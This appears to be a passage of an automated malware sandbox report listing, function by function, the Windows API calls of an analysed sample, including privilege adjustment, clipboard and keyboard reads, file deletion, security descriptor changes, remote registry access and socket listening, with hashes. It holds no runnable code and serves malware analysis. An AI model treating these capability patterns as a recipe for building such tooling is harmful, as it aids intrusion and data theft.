                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: eb853d6ad32100fb4b70fb05e4e2c7307c6f08331358cd4a7facf48b80bfd86c
                                                                            • Instruction ID: 3852534fec1cd5b5bf3f7c7de1ffbfe2d8509302de7949a881ab5990ac94cdfe
                                                                            • Opcode Fuzzy Hash: eb853d6ad32100fb4b70fb05e4e2c7307c6f08331358cd4a7facf48b80bfd86c
                                                                            • Instruction Fuzzy Hash: C8318871A4031C7BEB326B659C49F7F7F6CEB44B50F118056FA05EA1D0D6B55D00ABA0
                                                                            APIs
                                                                              • Part of subcall function 0033B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0033B180
                                                                              • Part of subcall function 0033B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0033B1AD
                                                                              • Part of subcall function 0033B134: GetLastError.KERNEL32 ref: 0033B1BA
                                                                            • _memset.LIBCMT ref: 0033AD08
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0033AD5A
                                                                            • CloseHandle.KERNEL32(?), ref: 0033AD6B
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0033AD82
                                                                            • GetProcessWindowStation.USER32 ref: 0033AD9B
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 0033ADA5
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0033ADBF
                                                                              • Part of subcall function 0033AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0033ACC0), ref: 0033AB99
                                                                              • Part of subcall function 0033AB84: CloseHandle.KERNEL32(?,?,0033ACC0), ref: 0033ABAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                            • String ID: $H*;$default$winsta0
                                                                            • API String ID: 2063423040-3753542593
                                                                            • Opcode ID: ae6a7d692f9a187f39ccf05df81a35e1003676baec367f6f10bc6de0a3622e7f
                                                                            • Instruction ID: 30392ed16986af50677b4e90843777ac0a33cea42cf1c082b70d5bbc665f3d9f
                                                                            • Opcode Fuzzy Hash: ae6a7d692f9a187f39ccf05df81a35e1003676baec367f6f10bc6de0a3622e7f
                                                                            • Instruction Fuzzy Hash: 28819CB1800209AFDF12DFA4DC89EEEBBBDEF08344F054159F964A61A1D7318E54DB61
                                                                            APIs
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00345FA6,?), ref: 00346ED8
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00345FA6,?), ref: 00346EF1
                                                                              • Part of subcall function 0034725E: __wsplitpath.LIBCMT ref: 0034727B
                                                                              • Part of subcall function 0034725E: __wsplitpath.LIBCMT ref: 0034728E
                                                                              • Part of subcall function 003472CB: GetFileAttributesW.KERNEL32(?,00346019), ref: 003472CC
                                                                            • _wcscat.LIBCMT ref: 00346149
                                                                            • _wcscat.LIBCMT ref: 00346167
                                                                            • __wsplitpath.LIBCMT ref: 0034618E
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003461A4
                                                                            • _wcscpy.LIBCMT ref: 00346209
                                                                            • _wcscat.LIBCMT ref: 0034621C
                                                                            • _wcscat.LIBCMT ref: 0034622F
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0034625D
                                                                            • DeleteFileW.KERNEL32(?), ref: 0034626E
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00346289
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00346298
                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 003462AD
                                                                            • DeleteFileW.KERNEL32(?), ref: 003462BE
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003462E1
                                                                            • FindClose.KERNEL32(00000000), ref: 003462FD
                                                                            • FindClose.KERNEL32(00000000), ref: 0034630B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                            • String ID: \*.*$p1v`Kv
                                                                            • API String ID: 1917200108-760996285
                                                                            • Opcode ID: 7be175d77ab644779c6248493f7b2abd4ffa31049a057ddfb07a6cc5a3cb7be7
                                                                            • Instruction ID: e249d57dddf401985bce5382a4e622739d01f2c98a95cd92658a94f9d5bba1e3
                                                                            • Opcode Fuzzy Hash: 7be175d77ab644779c6248493f7b2abd4ffa31049a057ddfb07a6cc5a3cb7be7
                                                                            • Instruction Fuzzy Hash: 045101B280822C6ACB22EB91DC45DDF77FCAF05300F0505E6E585EA141DE76A7498FA5
                                                                            APIs
                                                                            • OpenClipboard.USER32(0039DC00), ref: 00356B36
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00356B44
                                                                            • GetClipboardData.USER32(0000000D), ref: 00356B4C
                                                                            • CloseClipboard.USER32 ref: 00356B58
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00356B74
                                                                            • CloseClipboard.USER32 ref: 00356B7E
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00356B93
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00356BA0
                                                                            • GetClipboardData.USER32(00000001), ref: 00356BA8
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00356BB5
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00356BE9
                                                                            • CloseClipboard.USER32 ref: 00356CF6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                            • String ID:
                                                                            • API String ID: 3222323430-0
                                                                            • Opcode ID: f4dc11c548ac6760e88d9f20ed7dd39d6151d1cc95488f3bec926a886c6385b2
                                                                            • Instruction ID: 64f1c3e2ff4aa222b6be47fb43382df66ab7e0a50a1a0f562ec2587c60b2f614
                                                                            • Opcode Fuzzy Hash: f4dc11c548ac6760e88d9f20ed7dd39d6151d1cc95488f3bec926a886c6385b2
                                                                            • Instruction Fuzzy Hash: 17518D71204305ABD303AF61DD96F6E77ACAF94B12F410529F946DB1E1EF60D8098B62
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0034F62B
                                                                            • FindClose.KERNEL32(00000000), ref: 0034F67F
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0034F6A4
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0034F6BB
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0034F6E2
                                                                            • __swprintf.LIBCMT ref: 0034F72E
                                                                            • __swprintf.LIBCMT ref: 0034F767
                                                                            • __swprintf.LIBCMT ref: 0034F7BB
                                                                              • Part of subcall function 0032172B: __woutput_l.LIBCMT ref: 00321784
                                                                            • __swprintf.LIBCMT ref: 0034F809
                                                                            • __swprintf.LIBCMT ref: 0034F858
                                                                            • __swprintf.LIBCMT ref: 0034F8A7
                                                                            • __swprintf.LIBCMT ref: 0034F8F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 835046349-2428617273
                                                                            • Opcode ID: a8d36b760c790cf92941ba2d3352819f2f3ae2d40a5729d737aac52e74104ff4
                                                                            • Instruction ID: 2f84a4b665df40d37955a122e8148f001a358bcc9851308a815b5940e34b496a
                                                                            • Opcode Fuzzy Hash: a8d36b760c790cf92941ba2d3352819f2f3ae2d40a5729d737aac52e74104ff4
                                                                            • Instruction Fuzzy Hash: 22A132B1404344ABC316EBA4CC95DAFB7ECAF98704F440D1EF585CA192EB34D959CB62
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00351B50
                                                                            • _wcscmp.LIBCMT ref: 00351B65
                                                                            • _wcscmp.LIBCMT ref: 00351B7C
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00351B8E
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00351BA8
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00351BC0
                                                                            • FindClose.KERNEL32(00000000), ref: 00351BCB
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00351BE7
                                                                            • _wcscmp.LIBCMT ref: 00351C0E
                                                                            • _wcscmp.LIBCMT ref: 00351C25
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00351C37
                                                                            • SetCurrentDirectoryW.KERNEL32(003B39FC), ref: 00351C55
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00351C5F
                                                                            • FindClose.KERNEL32(00000000), ref: 00351C6C
                                                                            • FindClose.KERNEL32(00000000), ref: 00351C7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1803514871-438819550
                                                                            • Opcode ID: e1ae357a44a29f58d9372356976dc75e9c955722e703507cfe30d7496c9c1cd9
                                                                            • Instruction ID: b1a4502f72f5c7c0416b6d85b6c19431bcdb2669705c59f25168c8a7bc774ce7
                                                                            • Opcode Fuzzy Hash: e1ae357a44a29f58d9372356976dc75e9c955722e703507cfe30d7496c9c1cd9
                                                                            • Instruction Fuzzy Hash: 0D31C4325403196BDF22ABB4EC89FDE77AC9F05325F110195ED11E30A0EB71DE498B64
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00351CAB
                                                                            • _wcscmp.LIBCMT ref: 00351CC0
                                                                            • _wcscmp.LIBCMT ref: 00351CD7
                                                                              • Part of subcall function 00346BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00346BEF
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00351D06
                                                                            • FindClose.KERNEL32(00000000), ref: 00351D11
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00351D2D
                                                                            • _wcscmp.LIBCMT ref: 00351D54
                                                                            • _wcscmp.LIBCMT ref: 00351D6B
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00351D7D
                                                                            • SetCurrentDirectoryW.KERNEL32(003B39FC), ref: 00351D9B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00351DA5
                                                                            • FindClose.KERNEL32(00000000), ref: 00351DB2
                                                                            • FindClose.KERNEL32(00000000), ref: 00351DC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 1824444939-438819550
                                                                            Similarity
                                                                            • API ID: _memset
                                                                            • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                            • API String ID: 2102423945-2023335898
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 003509DF
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 003509EF
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003509FB
                                                                            • __wsplitpath.LIBCMT ref: 00350A59
                                                                            • _wcscat.LIBCMT ref: 00350A71
                                                                            • _wcscat.LIBCMT ref: 00350A83
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00350A98
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350AAC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350ADE
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350AFF
                                                                            • _wcscpy.LIBCMT ref: 00350B0B
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00350B4A
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3566783562-438819550
                                                                            APIs
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0033ABD7
                                                                              • Part of subcall function 0033ABBB: GetLastError.KERNEL32(?,0033A69F,?,?,?), ref: 0033ABE1
                                                                              • Part of subcall function 0033ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0033A69F,?,?,?), ref: 0033ABF0
                                                                              • Part of subcall function 0033ABBB: HeapAlloc.KERNEL32(00000000,?,0033A69F,?,?,?), ref: 0033ABF7
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0033AC0E
                                                                              • Part of subcall function 0033AC56: GetProcessHeap.KERNEL32(00000008,0033A6B5,00000000,00000000,?,0033A6B5,?), ref: 0033AC62
                                                                              • Part of subcall function 0033AC56: HeapAlloc.KERNEL32(00000000,?,0033A6B5,?), ref: 0033AC69
                                                                              • Part of subcall function 0033AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0033A6B5,?), ref: 0033AC7A
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0033A6D0
                                                                            • _memset.LIBCMT ref: 0033A6E5
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0033A704
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A715
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0033A752
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0033A76E
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A78B
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0033A79A
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0033A7A1
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0033A7C2
                                                                            • CopySid.ADVAPI32(00000000), ref: 0033A7C9
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0033A7FA
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0033A820
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0033A834
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: :$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$::: :
                                                                            • API String ID: 0-1407282530
                                                                            APIs
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00345FA6,?), ref: 00346ED8
                                                                              • Part of subcall function 003472CB: GetFileAttributesW.KERNEL32(?,00346019), ref: 003472CC
                                                                            • _wcscat.LIBCMT ref: 00346441
                                                                            • __wsplitpath.LIBCMT ref: 0034645F
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00346474
                                                                            • _wcscpy.LIBCMT ref: 003464A3
                                                                            • _wcscat.LIBCMT ref: 003464B8
                                                                            • _wcscat.LIBCMT ref: 003464CA
                                                                            • DeleteFileW.KERNEL32(?), ref: 003464DA
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003464EB
                                                                            • FindClose.KERNEL32(00000000), ref: 00346506
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                            • String ID: \*.*$p1v`Kv
                                                                            • API String ID: 2643075503-760996285
                                                                            APIs
                                                                              • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0036328E
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0036332D
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003633C5
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00363604
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00363611
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00342B5F
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00342BE0
                                                                            • GetKeyState.USER32(000000A0), ref: 00342BFB
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00342C15
                                                                            • GetKeyState.USER32(000000A1), ref: 00342C2A
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00342C42
                                                                            • GetKeyState.USER32(00000011), ref: 00342C54
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00342C6C
                                                                            • GetKeyState.USER32(00000012), ref: 00342C7E
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00342C96
                                                                            • GetKeyState.USER32(0000005B), ref: 00342CA8
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: d7ff8757c5016e36f7d32dbbffa4a66d9329db4f339c51a4a4d57ca9880b3545
                                                                            • Instruction ID: b1f273b455562df7936a961efcb53c57197a35e2593841a85b8d0c5028d5bc80
                                                                            • Opcode Fuzzy Hash: d7ff8757c5016e36f7d32dbbffa4a66d9329db4f339c51a4a4d57ca9880b3545
                                                                            • Instruction Fuzzy Hash: 85217A31300214AFDB12AF64DC4AF6E77E9EF48711F41885AF94ADB2A1DB34EC008B94
                                                                            APIs
                                                                              • Part of subcall function 00339ABF: CLSIDFromProgID.OLE32 ref: 00339ADC
                                                                              • Part of subcall function 00339ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00339AF7
                                                                              • Part of subcall function 00339ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00339B05
                                                                              • Part of subcall function 00339ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00339B15
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0035C235
                                                                            • _memset.LIBCMT ref: 0035C242
                                                                            • _memset.LIBCMT ref: 0035C360
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0035C38C
                                                                            • CoTaskMemFree.OLE32(?), ref: 0035C397
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 0035C3E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1300414916-2785691316
                                                                            • Opcode ID: 06bd9369457699b2073a1b146fc680c20bc0ccb40bf10603f668f6a7df9d8a30
                                                                            • Instruction ID: 962c891c7d52540431fa0cce6db9adb45db224f02fd0494e5d47bb45b23574cd
                                                                            • Opcode Fuzzy Hash: 06bd9369457699b2073a1b146fc680c20bc0ccb40bf10603f668f6a7df9d8a30
                                                                            • Instruction Fuzzy Hash: 90914C71D01218AFDB12DF95DC91EDEBBB8EF08710F10815AF915AB291DB709A49CFA0
                                                                            APIs
                                                                              • Part of subcall function 0033B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0033B180
                                                                              • Part of subcall function 0033B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0033B1AD
                                                                              • Part of subcall function 0033B134: GetLastError.KERNEL32 ref: 0033B1BA
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00347A0F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: fe4c08bba2adafc544b5ba0ddc92406f971df734a95542879272999ed5f99d4f
                                                                            • Instruction ID: b83448aa3d6ae099e901e09cd7b80b5e32282fea489fcd38de54b0ac970be569
                                                                            • Opcode Fuzzy Hash: fe4c08bba2adafc544b5ba0ddc92406f971df734a95542879272999ed5f99d4f
                                                                            • Instruction Fuzzy Hash: 8101A7716583116AF72B6664DC9ABBF73DC9B00740F150824FD43EA2D2D760BE0082B1
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00358CA8
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358CB7
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00358CD3
                                                                            • listen.WSOCK32(00000000,00000005), ref: 00358CE2
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358CFC
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00358D10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                            • String ID:
                                                                            • API String ID: 1279440585-0
                                                                            • Opcode ID: 45eafc9af5a84ba01a6fd2a8210a79b54624f621ee2f1f893284e73bbd4af782
                                                                            • Instruction ID: 6b85e447004251822ebb90088e9db36c1589b299a6acfbcfaa665675f8198f59
                                                                            • Opcode Fuzzy Hash: 45eafc9af5a84ba01a6fd2a8210a79b54624f621ee2f1f893284e73bbd4af782
